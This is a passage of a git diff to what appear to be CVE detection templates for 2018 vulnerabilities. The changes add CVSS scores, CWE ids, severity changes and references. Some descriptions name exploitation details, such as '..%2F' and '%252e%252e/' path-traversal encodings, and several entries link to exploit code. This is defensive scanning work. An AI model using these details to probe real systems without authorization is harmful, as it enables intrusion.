Open Redirect." + reference: + - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ + - https://usn.ubuntu.com/3726-1/ + - http://www.securitytracker.com/id/1041403 + - https://www.debian.org/security/2018/dsa-4264 + - http://www.securityfocus.com/bid/104970 + - https://access.redhat.com/errata/RHSA-2019:0265 requests: - method: GET diff --git a/cves/2018/CVE-2018-14728.yaml b/cves/2018/CVE-2018-14728.yaml index 09d221c05a..0eaff41a52 100644 --- a/cves/2018/CVE-2018-14728.yaml +++ b/cves/2018/CVE-2018-14728.yaml @@ -3,8 +3,17 @@ id: CVE-2018-14728 info: name: Responsive filemanager 9.13.1 - SSRF/LFI author: madrobot - severity: high + severity: critical tags: cve,cve2018,ssrf,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-14728 + cwe-id: CWE-918 + description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter." + reference: + - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html + - https://www.exploit-db.com/exploits/45103/ requests: - method: POST diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml index d13e41671f..546ea91901 100644 --- a/cves/2018/CVE-2018-15473.yaml +++ b/cves/2018/CVE-2018-15473.yaml @@ -3,10 +3,15 @@ id: CVE-2018-15473 info: name: OpenSSH Username Enumeration author: r3dg33k,daffainfo - severity: low + severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 tags: network,openssh,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-15473 + cwe-id: CWE-362 network: - host: diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index bfeb74b4de..ffe7f7ad24 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml @@ -6,8 +6,13 @@ info: reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt author: gy741 - severity: medium + severity: high tags: cve,cve2018,dlink,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N + cvss-score: 8.60 + cve-id: CVE-2018-15517 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml index 4c6646ce68..2304115e39 100644 --- a/cves/2018/CVE-2018-15535.yaml +++ b/cves/2018/CVE-2018-15535.yaml @@ -3,12 +3,17 @@ id: CVE-2018-15535 info: name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo - severity: medium + severity: high description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 - https://www.cvedetails.com/cve/CVE-2018-15535 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-15535 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-15745.yaml b/cves/2018/CVE-2018-15745.yaml index 1c889bef1d..5b249a3069 100644 --- a/cves/2018/CVE-2018-15745.yaml +++ b/cves/2018/CVE-2018-15745.yaml @@ -7,6 +7,11 @@ info: description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt tags: cve,cve2018,argussurveillance,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-15745 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index 1b13402b1e..2511f58f0e 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://www.exploit-db.com/exploits/45342 tags: cve,cve2018,iot,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16059 + cwe-id: CWE-22 + description: "Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter." requests: - method: POST diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 9f8c759dfc..da711614f9 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 tags: cve,cve2018,logontracer,rce,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16167 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index f0ff1c0ca4..5da2280652 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://www.exploit-db.com/exploits/45438 tags: cve,cve2018,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16283 + cwe-id: CWE-22 + description: "The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter." requests: - method: GET diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml index 8705a4dbee..d74869f104 100644 --- a/cves/2018/CVE-2018-16288.yaml +++ b/cves/2018/CVE-2018-16288.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45440 - https://www.cvedetails.com/cve/CVE-2018-16288 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2018-16288 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index fc05d97e9b..08a387bb74 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -7,6 +7,11 @@ info: description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter. reference: https://www.exploit-db.com/exploits/45439 tags: wordpress,cve2018,cve,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-16299 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-16668.yaml b/cves/2018/CVE-2018-16668.yaml index c871990b87..76cc91f0bd 100644 --- a/cves/2018/CVE-2018-16668.yaml +++ b/cves/2018/CVE-2018-16668.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,iot,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16668 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-16670.yaml b/cves/2018/CVE-2018-16670.yaml index f9157661e3..b253aecfda 100644 --- a/cves/2018/CVE-2018-16670.yaml +++ b/cves/2018/CVE-2018-16670.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,plc,iot,disclosure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16670 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-16671.yaml b/cves/2018/CVE-2018-16671.yaml index df6b1f3871..2457153b08 100644 --- a/cves/2018/CVE-2018-16671.yaml +++ b/cves/2018/CVE-2018-16671.yaml @@ -8,6 +8,11 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,iot,disclosure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-16671 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index d04aa76fc8..bcdb226a69 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -9,6 +9,12 @@ info: - https://www.exploit-db.com/exploits/47138 - https://www.getfuelcms.com/ # Vendor Homepage - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Software Link + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16763 + cwe-id: CWE-74 + description: "FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution." requests: - raw: diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml index 15aa7503d3..c4f12c3f51 100644 --- a/cves/2018/CVE-2018-17246.yaml +++ b/cves/2018/CVE-2018-17246.yaml @@ -2,12 +2,17 @@ id: CVE-2018-17246 info: name: Kibana Local File Inclusion author: princechaddha - severity: high + severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17246 + cwe-id: CWE-829 requests: - method: GET diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 433bc92b78..4cfc98d6bf 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -4,11 +4,16 @@ info: name: Joomla JCK Editor SQL Injection author: Suman_Kar description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. - severity: high + severity: critical tags: joomla,sqli,cve,cve2018 reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17254 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index 9f70ac8290..ab6e84abda 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-17431 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2018/CVE-2018-18069.yaml b/cves/2018/CVE-2018-18069.yaml index 890bb000cc..eab47b98dc 100644 --- a/cves/2018/CVE-2018-18069.yaml +++ b/cves/2018/CVE-2018-18069.yaml @@ -6,6 +6,13 @@ info: severity: medium description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. tags: cve,cve2018,wordpress,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + reference: + - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ requests: - method: POST diff --git a/cves/2018/CVE-2018-18775.yaml b/cves/2018/CVE-2018-18775.yaml index 12b50a4ea4..97386a655c 100644 --- a/cves/2018/CVE-2018-18775.yaml +++ b/cves/2018/CVE-2018-18775.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: microstrategy,xss reference: https://www.exploit-db.com/exploits/45755 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18775 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index cba64072e6..742080b74f 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml @@ -3,13 +3,18 @@ id: CVE-2018-18777 info: name: Path traversal vulnerability in Microstrategy Web version 7 author: 0x_Akoko - severity: high + severity: medium description: | Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. reference: https://www.exploit-db.com/exploits/45755 tags: microstrategy,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2018-18777 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml index 51fa08f10d..556e6cf52e 100644 --- a/cves/2018/CVE-2018-18778.yaml +++ b/cves/2018/CVE-2018-18778.yaml @@ -3,10 +3,15 @@ id: CVE-2018-18778 info: name: mini_httpd Path Traversal author: dhiyaneshDK - severity: high + severity: medium description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-18778 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml index 7e686b8ceb..1d426ddfe2 100644 --- a/cves/2018/CVE-2018-19386.yaml +++ b/cves/2018/CVE-2018-19386.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://www.cvedetails.com/cve/CVE-2018-19386/ tags: cve,cve2018,solarwinds,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-19386 + cwe-id: CWE-79 + description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI." requests: - method: GET diff --git a/cves/2018/CVE-2018-19439.yaml b/cves/2018/CVE-2018-19439.yaml index b953866c96..ba2f295d30 100644 --- a/cves/2018/CVE-2018-19439.yaml +++ b/cves/2018/CVE-2018-19439.yaml @@ -3,9 +3,18 @@ id: CVE-2018-19439 info: name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console author: madrobot,dwisiswant0 - severity: high + severity: medium description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4) tags: cve,cve2018,oracle,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-19439 + cwe-id: CWE-79 + reference: + - http://www.securityfocus.com/bid/106006 + - http://seclists.org/fulldisclosure/2018/Nov/58 + - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html requests: - method: GET diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml index bd3bb051fe..8bfc61e40a 100644 --- a/cves/2018/CVE-2018-19458.yaml +++ b/cves/2018/CVE-2018-19458.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45780 - https://www.cvedetails.com/cve/CVE-2018-19458 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-19458 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index a7af37791e..fa78623265 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -7,6 +7,11 @@ info: description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-20462 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml index 980bd20b83..15ee6fd76f 100644 --- a/cves/2018/CVE-2018-20470.yaml +++ b/cves/2018/CVE-2018-20470.yaml @@ -9,6 +9,11 @@ info: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://www.cvedetails.com/cve/CVE-2018-20470 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-20470 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-20824.yaml b/cves/2018/CVE-2018-20824.yaml index a86b7d6a62..174487aad6 100644 --- a/cves/2018/CVE-2018-20824.yaml +++ b/cves/2018/CVE-2018-20824.yaml @@ -6,6 +6,13 @@ info: severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter. tags: cve,cve2018,atlassian,jira,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-20824 + cwe-id: CWE-79 + reference: + - https://jira.atlassian.com/browse/JRASERVER-69238 requests: - method: GET diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index b2e578153b..9158d407cd 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -7,8 +7,13 @@ info: reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://www.cvedetails.com/cve/CVE-2018-20985/ - severity: high + severity: critical tags: cve,cve2018,wordpress,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-20985 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml index 23b40cee1b..448abf9d82 100644 --- a/cves/2018/CVE-2018-2392.yaml +++ b/cves/2018/CVE-2018-2392.yaml @@ -13,6 +13,11 @@ info: - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/ - https://troopers.de/troopers18/agenda/3r38lr/ - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2018-2392 + cwe-id: CWE-611 requests: - raw: diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml index 0421d15888..86e858609d 100644 --- a/cves/2018/CVE-2018-2628.yaml +++ b/cves/2018/CVE-2018-2628.yaml @@ -3,9 +3,15 @@ id: CVE-2018-2628 info: name: Oracle WebLogic Server Deserialization RCE author: milo2012 - severity: high + severity: critical reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 tags: cve,cve2018,oracle,weblogic,network + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2628 + cwe-id: CWE-502 + description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." network: - inputs: diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml index ab909a6e61..5dd0c7f892 100644 --- a/cves/2018/CVE-2018-2791.yaml +++ b/cves/2018/CVE-2018-2791.yaml @@ -3,9 +3,18 @@ id: CVE-2018-2791 info: name: Oracle WebCenter Sites XSS author: madrobot - severity: medium + severity: high description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware tags: cve,cve2018,oracle,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2018-2791 + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.securitytracker.com/id/1040695 + - http://www.securityfocus.com/bid/103800 + - https://www.exploit-db.com/exploits/44752/ requests: - method: GET diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml index 4fc9fa8c42..f87d6e3fa4 100644 --- a/cves/2018/CVE-2018-2893.yaml +++ b/cves/2018/CVE-2018-2893.yaml @@ -3,9 +3,14 @@ id: CVE-2018-2893 info: name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) author: milo2012 - severity: high + severity: critical tags: cve,cve2018,weblogic,network reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2893 + description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." network: - inputs: diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index 7b96e235fa..a192dae23d 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -7,6 +7,10 @@ info: reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ severity: critical tags: cve,cve2018,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2894 requests: - method: GET diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml index a69023eef5..45ba1789ea 100644 --- a/cves/2018/CVE-2018-3167.yaml +++ b/cves/2018/CVE-2018-3167.yaml @@ -3,9 +3,17 @@ id: CVE-2018-3167 info: name: Unauthenticated Blind SSRF in Oracle EBS author: geeknik - severity: low + severity: medium description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 tags: cve,cve2018,oracle,ebs,ssrf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-3167 + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html + - http://www.securitytracker.com/id/1041897 + - http://www.securityfocus.com/bid/105627 requests: - method: POST diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml index 27ef1d003f..e44ca7a0b5 100644 --- a/cves/2018/CVE-2018-3714.yaml +++ b/cves/2018/CVE-2018-3714.yaml @@ -2,9 +2,15 @@ id: CVE-2018-3714 info: name: node-srv Path Traversal author: madrobot - severity: high + severity: medium reference: https://hackerone.com/reports/309124 tags: cve,cve2018,nodejs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-3714 + cwe-id: CWE-22 + description: "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path." requests: - method: GET diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 49b4dc9d42..221891cb15 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -13,6 +13,11 @@ info: Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. tags: cve,cve2018,rails,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-3760 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index 84323e0f2a..d7c71edf22 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.exploit-db.com/exploits/43420 tags: wordpress,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-3810 + cwe-id: CWE-287 + description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code." requests: - method: POST diff --git a/cves/2018/CVE-2018-5230.yaml b/cves/2018/CVE-2018-5230.yaml index 4a1d51ccd1..3073e580b5 100644 --- a/cves/2018/CVE-2018-5230.yaml +++ b/cves/2018/CVE-2018-5230.yaml @@ -5,6 +5,14 @@ info: author: madrobot severity: medium tags: cve,cve2018,atlassian,confluence,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5230 + cwe-id: CWE-79 + description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified." + reference: + - https://jira.atlassian.com/browse/JRASERVER-67289 requests: - method: GET diff --git a/cves/2018/CVE-2018-5233.yaml b/cves/2018/CVE-2018-5233.yaml index 6dd9374e44..611c7a3a1e 100644 --- a/cves/2018/CVE-2018-5233.yaml 